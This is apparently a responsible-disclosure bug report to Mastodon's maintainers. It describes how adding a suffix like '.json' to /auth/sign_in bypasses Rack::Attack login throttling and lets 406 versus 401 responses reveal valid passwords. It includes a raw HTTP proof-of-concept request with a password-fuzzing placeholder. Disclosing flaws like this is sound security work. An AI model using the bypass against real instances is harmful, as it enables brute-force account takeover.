Description

Mastadon relies on the Rack_Attack.rb file to manage API throttling in the application through the declaration of absolute paths (i.e., /auth/sign_in). By appending random strings of characters to the end of the directory in a POST request it is possible to bypass brute force protections. Tester attempted to file this finding through Intigriti as requested on Github, however it’s noted that Intigriti is phasing this project out. Tester utilized the staging.mastodon.social demo application, and also a local installation of the application to confirm the vulnerability.

Tester was able to bypass sign-in restrictions by appending .json behind the directory, however any string is viable. It was possible to identify valid passwords based on a 406 response from the server, versus invalid responses containing a 401 error. Rack_Attack declares a 300 request per 5 minute limit, which appears to be the only appropriate restriction. Provided an attacker maintains less than 300 requests in 5 minutes it is possible to completely bypass all restrictions.

Note that the tester has a proof of concept fix for the issue already and is happy to work with the maintainer to fix it. Tester would ask that a comparable bounty amount be applied by the maintainer as it would be with Intigriti, where the low-end of a valid finding is 1,000 pounds, and a high end finding is 20,000 pounds. Tester would have submitted through Intigriti had it not been for the pending closure of the program unfortunately. Tester does realize that the prize pot is depleted on this platform, and it would be at the discretion of the maintainer to honor a payment or not. Either way, CVE status will be requested due to the severity of the finding.

Proof of Concept

POST /auth/sign_in.json HTTP/1.1
Host: staging.mastodon.social
Cookie: _mastodon_session=wM5JZ5uFbag8V81Jk2jWsVES1Gl8dkukxjZdaN%2FnNNHh9UFamiUn62zY8Mh9nR8zu82pD%2FddQndPV8rJTgIiMPppVybkaJ3ULzMmawkADNUvx7q9Lz8vmT0svrnKDfL9MqnQ5YhKEvIq6c3LPBM8O1U%2FT4qQk2FZIoyjc1S1O8kbBBj6eYztCHLDdC25PnZ9%2Fd0IOB2fEW9qDnvNrNzxw77UcgRHjt9GWCw%2BPTh1aBS6J8a9f94ZXf%2BlgE2dCubsH7V5PL8Ijuq1bsePt27q1Pb8TbXzCBaO%2FA%3D%3D--JIrYMu6fwlXhF3%2FU--cSi5lAMp4z2IyeM1WfCzdQ%3D%3D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 187
Origin: https://staging.mastodon.social
Dnt: 1
Referer: https://staging.mastodon.social/auth/sign_in
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

authenticity_token=1ItjuEy9z3KwYRBwjKswfJWvwnGXIrnLvn7AT2czIG1jYpaN193lao-RldsgPydOi06hRmp12FXs6zK0jd6sZA&user%5Bemail%5D=themayor%40intigriti.me&user%5Bpassword%5D=§testpasswordhere§&button=

None of the API endpoints noted in the Rack_Attack configuration appear to have appropriate constraints, which would allow comparable brute force attempts against each.

See following link for screenshot with bypass responses and times.
https://www.notion.so/themayor/Mastadon-Rack-Attack-7e665d571f4f407286480409594ef916